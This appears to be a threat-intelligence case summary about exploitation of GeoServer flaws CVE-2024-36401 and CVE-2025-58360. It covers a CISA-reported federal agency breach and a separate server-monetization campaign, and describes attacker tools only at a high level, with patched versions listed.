Vulnerability
Campaign
Incident
GeoServer exploitation, federal breach, and monetization activity
Updated 12.12.2025 07:01
Case score 68
Score breakdown
- Total
- 68
- Lead score
- 61
- Support bonus
- +7 / 20
- Scoring support
- 3
- Context members
- 0
Top contributors
- Vulnerability Anchors the case in active exploitation of **CVE-2024-36401** in **GeoServer** and the resulting federal breach story. base
- Campaign Shows separate **CVE-2024-36401** abuse against internet-exposed GeoServer instances for low-noise monetization. support
- Incident Provides confirmed fallout from **CVE-2024-36401** exploitation, including lateral movement and web shell use. support
- Vulnerability Adds later **GeoServer** exploitation pressure through **CVE-2025-58360** and its KEV listing. support
Case score 68
Members 4
Latest activity 12.12.2025 07:01
Active exploitation
Public PoC/exploit reported
KEV: CISA KEV
Patch available
Active exploitation
Public PoC/exploit reported
KEV: CISA KEV
Patch available
Members 4
First seen 23.08.2025 10:38
Last seen 12.12.2025 07:01
Updated 12.12.2025 07:01
Overview
**CVE-2024-36401** in **GeoServer** moved from patch release to active exploitation, with CISA later tying an unpatched GeoServer instance to a federal breach and a separate campaign using the same flaw to monetize exposed servers. The federal intrusion stayed active for about three weeks before EDR alerted, and the attackers expanded from GeoServer into additional internal systems.
A later **GeoServer CVE-2025-58360** KEV listing shows the product remains under sustained remediation pressure. Available evidence does not show that the newer XXE flaw was used in the federal breach, and exposure across GeoServer deployments is not quantified.
Attackers exploited **CVE-2024-36401** in **GeoServer** to gain access to exposed servers, and the same flaw also powered a separate campaign that turned internet-facing deployments into monetized infrastructure. CISA later disclosed that an unnamed U.S. federal civilian executive branch agency was breached through an unpatched GeoServer instance, with the intrusion remaining active for about three weeks before EDR alerted on suspicious activity.
The attackers used Burp Suite to find exposed systems, moved from one GeoServer into another, and then expanded to a web server and an SQL server. During the intrusion they dropped web shells such as China Chopper, used brute force for passwords, attempted **CVE-2016-5195** for privilege escalation, and used Stowaway for command-and-control traffic.
In a separate GeoServer exploitation campaign observed since early March 2025, operators used **CVE-2024-36401** against internet-exposed instances and delivered customized executables from adversary-controlled servers, including a private transfer.sh instance. CISA also added **CVE-2025-58360** in GeoServer to the KEV catalog after evidence of active exploitation, with fixed releases available in **2.25.6, 2.26.2, 2.27.0, 2.28.0, and 2.28.1**. Available evidence does not show that the later XXE flaw was used in the federal breach, and the scale of exposure across GeoServer deployments remains unquantified.